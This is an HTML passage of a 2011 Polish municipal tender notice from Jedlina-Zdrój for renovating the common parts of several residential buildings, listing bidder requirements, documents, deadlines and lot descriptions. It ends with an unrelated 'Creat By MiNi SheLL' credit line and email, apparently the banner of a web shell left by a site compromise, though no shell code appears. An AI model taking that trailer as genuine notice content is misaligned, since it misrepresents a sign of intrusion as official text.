- środki finansowe własne lub zdolność kredytową w wysokości nie mniejszej niż 80 000,00 zł. Na potwierdzenie niniejszego warunku Wykonawcy zobowiązani są przedłożyć informacje z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
dla zadania nr 10 - Budynek mieszkalny przy ul. H. Sienkiewicza 2
- ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia i posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej na kwotę ubezpieczenia nie mniejszą niż 40 000,00 zł. W przypadku, gdy termin obowiązywania polisy lub innego dokumentu ubezpieczenia będzie się kończył przed terminem zakończenia umowy, Wykonawca na 14 dni przed upływem tego terminu, ma obowiązek przedłożyć Zamawiającemu dokument o kontynuacji ubezpieczenia.

- środki finansowe własne lub zdolność kredytową w wysokości nie mniejszej niż 20 000,00 zł. Na potwierdzenie niniejszego warunku Wykonawcy zobowiązani są przedłożyć informacje z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
dla zadania nr 11 - Budynek mieszkalny przy ul. H. Sienkiewicza 2A
- ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia i posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej na kwotę ubezpieczenia nie mniejszą niż 100 000,00 zł. W przypadku, gdy termin obowiązywania polisy lub innego dokumentu ubezpieczenia będzie się kończył przed terminem zakończenia umowy, Wykonawca na 14 dni przed upływem tego terminu, ma obowiązek przedłożyć Zamawiającemu dokument o kontynuacji ubezpieczenia.

- środki finansowe własne lub zdolność kredytową w wysokości nie mniejszej niż 50 000,00 zł. Na potwierdzenie niniejszego warunku Wykonawcy zobowiązani są przedłożyć informacje z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
dla zadania nr 12 - Budynek mieszkalny przy ul. Świdnickiej 15
- ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia i posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej na kwotę ubezpieczenia nie mniejszą niż  30 000,00 zł. W przypadku, gdy termin obowiązywania polisy lub innego dokumentu ubezpieczenia będzie się kończył przed terminem zakończenia umowy, Wykonawca na 14 dni przed upływem tego terminu, ma obowiązek przedłożyć Zamawiającemu dokument o kontynuacji ubezpieczenia.

- środki finansowe własne lub zdolność kredytową w wysokości nie mniejszej niż 15 000,00 zł. Na potwierdzenie niniejszego warunku Wykonawcy zobowiązani są przedłożyć informacje z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 

Dla zadania nr 13 - Budynek mieszkalny przy ul. Zakopiańskiej 3
- ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia i posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej na kwotę ubezpieczenia nie mniejszej niż  100 000,00 zł. W przypadku, gdy termin obowiązywania polisy lub innego dokumentu ubezpieczenia będzie się kończył przed terminem zakończenia umowy, Wykonawca na 14 dni przed upływem tego terminu, ma obowiązek przedłożyć Zamawiającemu dokument o kontynuacji ubezpieczenia.

- środki finansowe własne lub zdolność kredytową w wysokości nie mniejszej niż 50 000,00 zł. Na potwierdzenie niniejszego warunku Wykonawcy zobowiązani są przedłożyć informacje z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 

UWAGA: W przypadku, gdy oferta dotyczy kilku części, kwoty ubezpieczenia OC oraz posiadanych środków finansowych lub zdolności kredytowej należy zsumować.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) informacja o podwykonawcach dla każdego zadania osobno - wg wzoru Załącznika Nr 8
Wykonawca wskaże w ofercie część zamówienia, której wykonanie zamierza powierzyć podwykonawcy - jeżeli dotyczy,
2) pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik Wykonawcy,
3) zaakceptowany projekt umowy - wg wzoru Załącznika Nr 9
4) dowód wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania następujących zmian w zawartej umowie w sprawie niniejszego zamówienia publicznego, określając jednocześnie warunki ich wprowadzenia: 
a) zmiany osób wykonujących czynności Wykonawcy, wymienionych w ofercie, pod warunkiem wyrażenia zgody przez Zamawiającego oraz że osoby te będą spełniać warunki opisane w SIWZ,
b) zmiany podwykonawców,
c) ustawowa zmiana wysokości podatku VAT,
2. Wykonawca może wnioskować o przedłużenie terminu wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
a) zawieszenia robót przez Zamawiającego,
b) szczególnie niesprzyjających warunków atmosferycznych,
c) wystąpienie w czasie realizacji przedmiotu umowy zamówień dodatkowych, od wykonania których uzależnione jest wykonanie zamówienia podstawowego lub uzupełniającego, z tym, iż art. 67 ust. 1 pkt. 5 lub pkt. 6 ustawy Pzp stosuje się odpowiednio</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.jedlina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Jedlina-Zdrój ul. Poznańska Nr 2, 58-330 Jedlina-Zdrój, pok. Nr 4b.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.11.2011 godzina 09:00, miejsce: Urząd Miasta Jedlina-Zdrój ul. Poznańska Nr 2, 58-330 Jedlina-Zdrój -Biuro Obsługi Klienta - Kancelaria Ogólna, pokój Nr 4,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany jest przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 Priorytet 9 - Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska (Miasta), Działanie 9.2  - Wsparcie dla przedsięwzięć w zakresie mieszkalnictwa w miastach poniżej 10 tysięcy mieszkańców..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 5 - Budynek mieszkalny przy ul. Bolesława Chrobrego 21.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia dla zadania nr 5 jest zaprojektowanie i wykonanie robót budowlanych w zakresie remontu pokrycia dachowego i remontu kominów, remontu klatki schodowej, wymiany stolarki okiennej i drzwiowej oraz remontu instalacji elektrycznej w częściach wspólnych wraz z niezbędnymi robotami towarzyszącymi.
Na wykonawcy ciąży obowiązek uzyskania niezbędnych pozwoleń, uzgodnień, warunków technicznych przyłączeń, które są niezbędne do realizacji przedmiotu zamówienia wraz z kosztami ich uzyskania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 71.22.00.00-6, 45.26.19.10-2, 45.31.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 6 - Budynek mieszkalny przy ul. Bolesława Chrobrego 22.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia dla zadania nr 6 jest zaprojektowanie i wykonanie robót budowlanych w zakresie remontu pokrycia dachowego i remontu kominów, remontu klatki schodowej, wymiany stolarki okiennej i drzwiowej oraz remontu instalacji elektrycznej w częściach wraz z niezbędnymi robotami towarzyszącymi.
Na wykonawcy ciąży obowiązek uzyskania niezbędnych pozwoleń, uzgodnień, warunków technicznych przyłączeń, które są niezbędne do realizacji przedmiotu zamówienia wraz z kosztami ich uzyskania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 71.22.00.00-6, 45.26.19.10-6, 45.31.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 7 - Budynek mieszkalny przy ul. Kłodzkiej 44.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia dla zadania nr 7 jest zaprojektowanie i wykonanie robót budowlanych w zakresie remontu pokrycia dachowego, remontu klatki schodowej, wymiany stolarki okiennej i drzwiowej oraz remontu instalacji elektrycznej w częściach wspólnych wraz z niezbędnymi robotami towarzyszącymi.
Na wykonawcy ciąży obowiązek uzyskania niezbędnych pozwoleń, uzgodnień, warunków technicznych przyłączeń, które są niezbędne do realizacji przedmiotu zamówienia wraz z kosztami ich uzyskania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 71.22.00.00-6, 45.31.20.00-2, 45.26.19.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 8- Budynek mieszkalny przy ul. Stanisława Moniuszki 23.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia dla zadania nr 8 jest zaprojektowanie i wykonanie robót budowlanych w zakresie remontu pokrycia dachowego i remontu podłogi strychu, remontu klatki schodowej, wymiany stolarki okiennej i drzwiowej, remontu instalacji sanitarnej w częściach wspólnych oraz remontu elewacji (bez docieplenia) wraz z niezbędnymi robotami towarzyszącymi.
Na wykonawcy ciąży obowiązek uzyskania niezbędnych pozwoleń, uzgodnień, warunków technicznych przyłączeń, które są niezbędne do realizacji przedmiotu zamówienia wraz z kosztami ich uzyskania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 71.22.00.00-6, 45.26.19.10-6, 45.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 9 - Budynek mieszkalny przy ul. Noworudzkiej 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia dla zadania nr 9 jest zaprojektowanie i wykonanie robót budowlanych zakresie remontu pokrycia dachowego, remontu klatki schodowej, wymiany stolarki okiennej i drzwiowej oraz remontu instalacji elektrycznej w częściach wspólnych wraz z niezbędnymi robotami towarzyszącymi.
Na wykonawcy ciąży obowiązek uzyskania niezbędnych pozwoleń, uzgodnień, warunków technicznych przyłączeń, które są niezbędne do realizacji przedmiotu zamówienia wraz z kosztami ich uzyskania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 71.22.00.00-6, 45.26.19.10-6, 45.31.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 10 - Budynek mieszkalny przy ul. Henryka Sienkiewicza 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia dla zadania nr 10 jest zaprojektowanie i wykonanie robót budowlanych w zakresie remontu klatki schodowej, wymiany stolarki okiennej i drzwiowej oraz remontu instalacji elektrycznej, sanitarnej, wodociągowej i gazowej wraz z przyłączem w częściach wspólnych wraz z niezbędnymi robotami towarzyszącymi.
Na wykonawcy ciąży obowiązek uzyskania niezbędnych pozwoleń, uzgodnień, warunków technicznych przyłączeń, które są niezbędne do realizacji przedmiotu zamówienia wraz z kosztami ich uzyskania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 71.22.00.00-6, 45.26.19.10-6, 45.31.20.00-2, 45.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 11 - Budynek mieszkalny przy ul. Henryka Sienkiewicza 2a.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia dla zadania nr 11 jest zaprojektowanie i wykonanie robót budowlanych w zakresie remontu pokrycia dachowego, remontu klatki schodowej, wymiany stolarki okiennej i drzwiowej oraz remontu instalacji elektrycznej, sanitarnej, wodociągowej i gazowej w częściach wspólnych wraz z niezbędnymi robotami towarzyszącymi.
Na wykonawcy ciąży obowiązek uzyskania niezbędnych pozwoleń, uzgodnień, warunków technicznych przyłączeń, które są niezbędne do realizacji przedmiotu zamówienia wraz z kosztami ich uzyskania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 71.22.00.00-6, 45.26.19.10-6, 45.31.20.00-2, 45.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 12 - Budynek mieszkalny przy ul. Świdnickiej 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia dla zadania nr 12 jest zaprojektowanie i wykonanie robót budowlanych w zakresie remontu podłóg strychu, remontu klatki schodowej oraz remontu instalacji elektrycznej, sanitarnej i wodociągowej w częściach wspólnych wraz z niezbędnymi robotami towarzyszącymi.
Na wykonawcy ciąży obowiązek uzyskania niezbędnych pozwoleń, uzgodnień, warunków technicznych przyłączeń, które są niezbędne do realizacji przedmiotu zamówienia wraz z kosztami ich uzyskania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 71.22.00.00-6, 45.26.19.10-6, 45.31.20.00-2, 45.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 13 - Budynek mieszkalny przy ul. Zakopiańskiej 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia dla zadania nr 13 jest zaprojektowanie i wykonanie robót budowlanych w zakresie remontu klatki schodowej, remontu elewacji (malowanie) oraz remontu instalacji elektrycznej i sanitarnej w częściach wspólnych wraz z niezbędnymi robotami towarzyszącymi.
Na wykonawcy ciąży obowiązek uzyskania niezbędnych pozwoleń, uzgodnień, warunków technicznych przyłączeń, które są niezbędne do realizacji przedmiotu zamówienia wraz z kosztami ich uzyskania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 71.22.00.00-6, 45.26.19.10-6, 45.31.20.00-2, 45.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com